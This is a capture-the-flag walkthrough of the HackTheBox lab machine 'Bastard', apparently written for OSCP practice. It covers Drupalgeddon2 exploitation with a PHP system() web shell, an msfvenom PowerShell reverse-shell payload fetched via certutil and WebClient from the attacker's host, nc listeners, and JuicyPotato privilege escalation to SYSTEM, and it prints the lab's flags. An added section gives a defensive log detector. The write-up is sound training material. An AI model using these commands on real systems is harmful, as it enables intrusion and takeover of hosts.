HackTheBox | Bastard

In: HackTheBox, TJ Null OSCP Practice, OSCP Prep, Attack, CTF

Nmap Results

# Nmap 7.92 scan initiated Tue Aug 16 00:34:56 2022 as: nmap -T5 -p80,135,49154 -A -oA scan-all -Pn 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.014s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   15.45 ms 10.10.14.1
2   15.71 ms 10.10.10.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 16 00:36:10 2022 -- 1 IP address (1 host up) scanned in 74.38 seconds





Service Enumeration

TCP/80

Good info from the nmap scan:

  • http-server-header: Microsoft-IIS/7.5
  • Drupal 7

I check out the /robots.txt file and note the /CHANGELOG.txt entry. Opened in the browser, it discloses a precise Drupal version number, which I note for exploit research.

I tried to enumerate more files and folders with gobuster and feroxbuster, but the web server is throttling my requests, so I'll focus on researching vulnerabilities for this version of Drupal instead.

Let's see what kind of exploits are available in Exploit DB. I am going to filter out authenticated and Metasploit payloads because:

  • We do not have a valid set of credentials
  • Doing this as OSCP prep, so trying to limit Metasploit usage
searchsploit Drupal 7 | grep -viE 'authenticated|metasploit'

This exploit looks like it could work for the version of Drupal on the target:

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb

Let's copy the exploit to the current working directory:

searchsploit -m 44449

Now, let's examine the exploit:

  • The exploit first makes a request to the user registration form; the URL differs depending on whether Drupal clean URLs are enabled.
# Make a request, check for clean URLs status ~ Enabled: /user/register   Disabled: /?q=user/register

  • Then, the exploit crafts a URL and payload depending on the Drupal version.
  • For Drupal 7, we inject the payload into the name field of the form
# Function gen_evil_url <cmd> [method] [shell] [phpfunction]
def gen_evil_url(evil, element="", shell=false, phpfunction="passthru")

  • Next, the exploit tests code execution in the web form by injecting a random string into the name field
  • If the server responds with HTTP 200 or HTTP 500 and a non-empty body, we should be good to exploit
# Generate a random string to see if we can echo it
random = (0...8).map { (65 + rand(26)).chr }.join
url, payload = gen_evil_url("echo #{random}", e)

response = http_request(url, "post", payload, $session_cookie)
if (response.code == "200" or response.code == "500") and not response.body.empty?

  • Finally, the exploit injects a PHP backdoor via the form field and writes it to shell.php in the web root
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"

# Test to see if backdoor is there (if we managed to write it)
response = http_request("#{$target}#{webshellpath}", "post", "c=hostname", $session_cookie)
if response.code == "200" and not response.body.empty?
  puts success("Very Good News Everyone! Wrote to the web root! Waayheeeey!!!")
  break
# Forever loop
loop do
  # Default value
  result = "~ERROR~"

  # Get input
  command = Readline.readline("#{prompt}>> ", true).to_s

  # Check input
  puts warning("WARNING: Detected an known bad character (>)") if command =~ />/

  # Exit
  break if command == "exit"

...
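The exploit walkthrough above describes two artefacts a defender can look for in the IIS logs: a Drupal Form API key (a parameter name starting with `#`, sent URL-encoded as `%23`) arriving in a request to the user form, and subsequent requests to a PHP file such as shell.php that Drupal 7 never ships at its web root. The following detector is an added example, not code from the writeup or from the 44449.rb exploit; the IIS W3C log lines it scans are constructed, and the allowlist of Drupal 7 root PHP files and the rule names are my own choices.

```python
import re
from urllib.parse import unquote

# Known PHP entry points at a Drupal 7 web root; any other *.php at the root
# (such as a dropped shell.php) is worth an alert.
DRUPAL7_ROOT_PHP = {"/index.php", "/cron.php", "/install.php", "/update.php",
                    "/authorize.php", "/xmlrpc.php"}

# Drupal Form API keys begin with '#'. They must never come from the client,
# so '[#' (or '[%23' before decoding) inside a request parameter is a red flag.
FORM_API_KEY = re.compile(r"\[#")

FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status",
          "sc-substatus", "sc-win32-status", "time-taken"]

# Constructed IIS W3C log excerpt (not taken from the target): line 4 carries a
# Form API key in the query string, line 5 hits a PHP file Drupal never ships.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2022-08-16 04:40:10 10.10.10.9 GET /node/1 - 80 - 10.10.14.9 Mozilla/5.0 200 0 0 5
2022-08-16 04:40:12 10.10.10.9 POST /user/register - 80 - 10.10.14.5 Mozilla/5.0 200 0 0 31
2022-08-16 04:40:13 10.10.10.9 POST / q=user/password&name[%23post_render][]=x 80 - 10.10.14.5 Mozilla/5.0 500 0 0 44
2022-08-16 04:40:15 10.10.10.9 POST /shell.php - 80 - 10.10.14.5 Mozilla/5.0 200 0 0 12
2022-08-16 04:41:00 10.10.10.9 GET /cron.php - 80 - 10.10.14.9 Mozilla/5.0 200 0 0 30
"""

def parse_line(line):
    """Return one W3C log line as a dict, or None for directives and blanks."""
    parts = line.split()
    if not parts or line.startswith("#") or len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def classify(rec):
    """Return the names of the rules that fire for one parsed request."""
    hits = []
    if FORM_API_KEY.search(unquote(rec["cs-uri-query"])):
        hits.append("form-api-key-injection")
    stem = rec["cs-uri-stem"].lower()
    if re.fullmatch(r"/[^/]+\.php", stem) and stem not in DRUPAL7_ROOT_PHP:
        hits.append("unknown-root-php")
    return hits

def scan_log(text):
    """Return (line_no, client_ip, rule) for every suspicious request."""
    alerts = []
    for no, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        for rule in classify(rec) if rec else []:
            alerts.append((no, rec["c-ip"], rule))
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

IIS does not log POST bodies, so the `c=hostname` command in the web-shell request is invisible here; the request to an unexpected root PHP file is the signal to pivot on.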





Exploit

You may need to install a required Ruby dependency to use this exploit:

sudo gem install highline

Then, run the exploit:

ruby 44449.rb http://10.10.10.9





Post-Exploit Enumeration

The first order of business will be to get a more reliable shell. I am going to double-check the target system architecture and generate a reverse shell payload using msfvenom that I can execute as needed through the PHP pseudo-shell.

drupalgeddon2 >> systeminfo

System Type:               x64-based PC

Now, generate a reverse shell payload.

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -a x64 --platform windows -e x64/xor_dynamic -b '\x00' -f exe -o shell.exe

Start a Python web server to transfer the file to the target:

sudo python3 -m http.server 80

Use the PHP pseudo-shell to download the file to the target:

certutil.exe -urlcache -split -f http://kali-vpn-ip/shell.exe C:\Windows\Temp\shell.exe

Start a listener and run the exploit:

sudo nc -lnvp <kali-tcp-port>

drupalgeddon2 >> cmd.exe /c C:\Windows\Temp\shell.exe

Operating Environment

OS & Kernel

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3582622-84461
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          16/8/2022, 7:32:24 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.494 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.512 MB
Virtual Memory: In Use:    583 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

Current User

USER INFORMATION
----------------

User Name         SID     
================= ========
nt authority\iusr S-1-5-17


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Group used for deny only                          
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled



Users and Groups

Local Users

AccountType Domain  Name          Disabled
----------- ------  ----          --------
        512 BASTARD Administrator    False
        512 BASTARD dimitris         False
        512 BASTARD Guest             True

Local Groups

Domain                                  Name                                   
------                                  ----                                   
BASTARD                                 Administrators                         
BASTARD                                 Backup Operators                       
BASTARD                                 Certificate Service DCOM Access        
BASTARD                                 Cryptographic Operators                
BASTARD                                 Distributed COM Users                  
BASTARD                                 Event Log Readers                      
BASTARD                                 Guests                                 
BASTARD                                 IIS_IUSRS                              
BASTARD                                 Network Configuration Operators        
BASTARD                                 Performance Log Users                  
BASTARD                                 Performance Monitor Users              
BASTARD                                 Power Users                            
BASTARD                                 Print Operators                        
BASTARD                                 Remote Desktop Users                   
BASTARD                                 Replicator                             
BASTARD                                 Users



Network Configurations

Interfaces

Windows IP Configuration

   Host Name . . . . . . . . . . . . : Bastard
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-42-2D
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.10.10.9(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
   DNS Servers . . . . . . . . . . . : 10.10.10.2
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{56FEC108-3F71-4327-BF45-2B4EE355CD0F}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Open Ports

  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:81             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1072
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       372
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       744
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       796
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       480
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       496
  TCP    10.10.10.9:139         0.0.0.0:0              LISTENING       4
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:81                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       668
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       372
  TCP    [::]:49153             [::]:0                 LISTENING       744
  TCP    [::]:49154             [::]:0                 LISTENING       796
  TCP    [::]:49155             [::]:0                 LISTENING       480
  TCP    [::]:49156             [::]:0                 LISTENING       496





Privilege Escalation

Looking at the output of the whoami command, the first thing that stuck out to me is SeImpersonatePrivilege, which immediately makes me think JuicyPotato.

The privilege escalation process will look like this:

  1. Download the 64-bit JuicyPotato.exe binary to Kali
  2. Transfer it to the target using a Python web server
  3. Find a CLSID for ComSvcs process
  4. Start a listener on Kali
  5. Run JuicyPotato.exe and re-use the PowerShell reverse shell payload we already put on the host at C:\Windows\Temp\shell.exe.



First step is to download JuicyPotato.exe from the ohpe/juicy-potato releases page and spin up the Python web server.

wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
sudo python3 -m http.server 80

Now, let's download it to the target using our PowerShell reverse shell:

(New-Object Net.WebClient).DownloadFile('http://kali-vpn-ip/JuicyPotato.exe', 'C:\Windows\Temp\JuicyPotato.exe')

You can find a list of ComSvcs CLSID GUIDs for Windows Server 2008 R2 in the juicy-potato repository's CLSID list for Windows Server 2008 R2 Enterprise. Preferably, choose a CLSID with SYSTEM privileges.

Start a listener on Kali and run the exploit. We are going to re-use our PowerShell reverse shell payload, so use the same TCP port as before.

sudo nc -lnvp <kali-tcp-port>

We'll use the JuicyPotato.exe exploit to run cmd.exe as SYSTEM, which will then invoke our reverse shell.

C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a '/c C:\Windows\Temp\shell.exe' -l 4444 -t * -c '{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}'





Flags

C:\Users\dimitris\Desktop\user.txt

d74dd2dd6d42153770e0acbed24eb314

C:\Users\Administrator\Desktop\root.txt

176631de8dd060d1c027607d0639471c